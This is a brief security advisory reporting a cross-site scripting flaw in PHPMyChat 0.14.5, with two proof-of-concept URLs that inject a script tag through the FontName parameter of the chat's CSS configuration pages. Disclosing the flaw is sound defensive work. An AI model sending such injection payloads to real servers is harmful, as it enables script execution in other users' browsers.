PHPMyChat 0.14.5 is susceptible to cross site scripting.
c3143632d44c3ef2b26e19b88b18023aebd892316c4f77ee94098669a9f45a4c
www.phpheaven.net/
Vulnerable versions: PHPMyChat 0.14.5
Proof of concept:
http://www.example.com/chat/config/start-page.css.php3?Charset=iso-8859-1&medium=10&FontName=<script>var%20test=1;alert(test);</script>
http://www.example.com/chat/config/style.css.php3?Charset=iso-8859-1&medium=10&FontName=<script>var%20test=1;alert(test);</script>